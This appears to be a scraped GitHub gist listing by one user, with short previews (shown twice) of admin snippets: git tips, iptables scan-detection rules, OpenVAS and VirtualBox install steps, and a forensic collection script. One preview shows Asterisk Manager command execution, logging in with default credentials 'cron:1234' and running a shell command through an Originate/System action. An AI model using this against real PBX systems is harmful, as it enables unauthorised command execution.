Daniel Roberson droberson

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                droberson
                / keybase.md
            
            
              Created
              August 19, 2016 00:20
            
              
                keybase
              
          
    Keybase proof

I hereby claim:

I am droberson on github.
I am droberson (https://keybase.io/droberson) on keybase.
I have a public key whose fingerprint is 8124 9A31 8C19 7335 54E0  69E2 2D8B AC25 9AFA E810

To claim this, I am signing this object:

  
## arg.py
#!/usr/bin/env python

import argparse

def main():
    description = "example: ./argparse.py [--foo arg] [arg1 arg2]"
    parser = argparse.ArgumentParser(description=description)
    parser.add_argument("arg1", nargs="?", help="Argument 1")
    parser.add_argument("arg2", nargs="?", help="Argument 2")
    parser.add_argument("-f", "--foo", required=False, help="foo argument")

## Asterisk Manager command execution
Many PBX distros include default Asterisk Manager credentials. Vicidial uses cron:1234.
This requires a valid, registered extension to work. This example pings you. Verify with
tcpdump or Wireshark.

USER="cron"
SECRET="1234"
PROTOCOL="IAX2" # Could be SIP or something else.
EXTENSION="4000"
COMMAND="ping -c 5 10.10.10.10"
(echo "ACTION: LOGIN\r\nUSERNAME: ${USER}\r\nSECRET: ${SECRET}\r\n\r\nAction: Originate\r\nChannel: ${PROTOCOL}/${EXTENSION}\r\nExten: ${EXTENSION}\r\nPriority: 1\r\nCallerID: lol\r\nApplication: System\r\nData: ${COMMAND}\r\n\r\n") | \

## gist:c9f7c81209c8ff25ba4556c5809b50bb
This will start logging and block hosts that connect to a host quicker than 10 times in 30 seconds. This severely slows down Nmap scans against you and provides a heads up that you're being scanned by a port scanner or something like dirbuster/sqlmap/hydra that make a lot of connections in rapid succession:

iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A FORWARD -j LOGGING

iptables -A LOGGING -p tcp -i eth0 -m state --state NEW -m recent --set
iptables -A LOGGING -p tcp -i eth0 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j LOG --log-prefix "portscan: " --log-level 4

iptables -A LOGGING -j DROP

## Installing OpenVAS 9 on Ubuntu 16.04
# Install OpenVAS + Greenbone Security Assistant on Ubuntu 16.04 (using openvas9 metapackage)
apt update && apt upgrade
apt install python-software-properties
apt install sqlite3
apt install software-properties-common
apt install python-software-properties
add-apt-repository ppa:mrazavi/openvas
apt-get update
apt-get install openvas9
apt install libopenvas9-dev ### if you want to develop

## gist:1c343ab66d46bd9cd9ab198f74e8eb7f

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                droberson
                / gist:1c343ab66d46bd9cd9ab198f74e8eb7f
            
            
              Last active
              April 11, 2021 22:25
                — forked from CristinaSolana/gist:1885435
            
              
                Keeping a fork up to date
              
          
    1. Clone your fork:

git clone git@github.com:YOUR-USERNAME/YOUR-FORKED-REPO.git

2. Add remote from original repository in your forked repository:

cd into/cloned/fork-repo
git remote add upstream git://github.com/ORIGINAL-DEV-USERNAME/REPO-YOU-FORKED-FROM.git
git fetch upstream


## Squashing multiple commits
1. git checkout -b squashed_branch
2. git rebase -i master
3. edit the file:

pick aaaaaaa commit message 1
pick bbbbbbb commit message 2
pick ccccccc commit message 3
...

->

## oui.py
#!/usr/bin/env python3

from tempfile import mkstemp
from os import remove, fdopen

import requests

ouilist = requests.get("http://standards-oui.ieee.org/oui.txt")

tmpfd, tmpfile = mkstemp()

## linux-collect-volatile-data.sh
#!/bin/sh

LOGFILE="volatile.log"

exectee () {
        echo "[+] $@" | tee -a $LOGFILE
        $@ | tee -a $LOGFILE
        echo | tee -a $LOGFILE
}

## install-vagrant-ubuntu18.sh
#!/bin/sh

# install latest virtualbox and vagrant

wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add -
wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- | sudo apt-key add -

sudo add-apt-repository "deb [arch=amd64] http://download.virtualbox.org/virtualbox/debian $(lsb_release -cs) contrib"
sudo apt update
sudo apt install -y virtualbox-6.0
	#!/usr/bin/env python

	import argparse

	def main():
	description = "example: ./argparse.py [--foo arg] [arg1 arg2]"
	parser = argparse.ArgumentParser(description=description)
	parser.add_argument("arg1", nargs="?", help="Argument 1")
	parser.add_argument("arg2", nargs="?", help="Argument 2")
	parser.add_argument("-f", "--foo", required=False, help="foo argument")
	Many PBX distros include default Asterisk Manager credentials. Vicidial uses cron:1234.
	This requires a valid, registered extension to work. This example pings you. Verify with
	tcpdump or Wireshark.

	USER="cron"
	SECRET="1234"
	PROTOCOL="IAX2" # Could be SIP or something else.
	EXTENSION="4000"
	COMMAND="ping -c 5 10.10.10.10"
	(echo "ACTION: LOGIN\r\nUSERNAME: ${USER}\r\nSECRET: ${SECRET}\r\n\r\nAction: Originate\r\nChannel: ${PROTOCOL}/${EXTENSION}\r\nExten: ${EXTENSION}\r\nPriority: 1\r\nCallerID: lol\r\nApplication: System\r\nData: ${COMMAND}\r\n\r\n") \| \
	This will start logging and block hosts that connect to a host quicker than 10 times in 30 seconds. This severely slows down Nmap scans against you and provides a heads up that you're being scanned by a port scanner or something like dirbuster/sqlmap/hydra that make a lot of connections in rapid succession:

	iptables -N LOGGING
	iptables -A INPUT -j LOGGING
	iptables -A FORWARD -j LOGGING

	iptables -A LOGGING -p tcp -i eth0 -m state --state NEW -m recent --set
	iptables -A LOGGING -p tcp -i eth0 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j LOG --log-prefix "portscan: " --log-level 4

	iptables -A LOGGING -j DROP
	# Install OpenVAS + Greenbone Security Assistant on Ubuntu 16.04 (using openvas9 metapackage)
	apt update && apt upgrade
	apt install python-software-properties
	apt install sqlite3
	apt install software-properties-common
	apt install python-software-properties
	add-apt-repository ppa:mrazavi/openvas
	apt-get update
	apt-get install openvas9
	apt install libopenvas9-dev ### if you want to develop
	1. git checkout -b squashed_branch
	2. git rebase -i master
	3. edit the file:

	pick aaaaaaa commit message 1
	pick bbbbbbb commit message 2
	pick ccccccc commit message 3
	...

	->
	#!/usr/bin/env python3

	from tempfile import mkstemp
	from os import remove, fdopen

	import requests

	ouilist = requests.get("http://standards-oui.ieee.org/oui.txt")

	tmpfd, tmpfile = mkstemp()
	#!/bin/sh

	LOGFILE="volatile.log"

	exectee () {
	echo "[+] $@" \| tee -a $LOGFILE
	$@ \| tee -a $LOGFILE
	echo \| tee -a $LOGFILE
	}
	#!/bin/sh

	# install latest virtualbox and vagrant

	wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- \| sudo apt-key add -
	wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- \| sudo apt-key add -

	sudo add-apt-repository "deb [arch=amd64] http://download.virtualbox.org/virtualbox/debian $(lsb_release -cs) contrib"
	sudo apt update
	sudo apt install -y virtualbox-6.0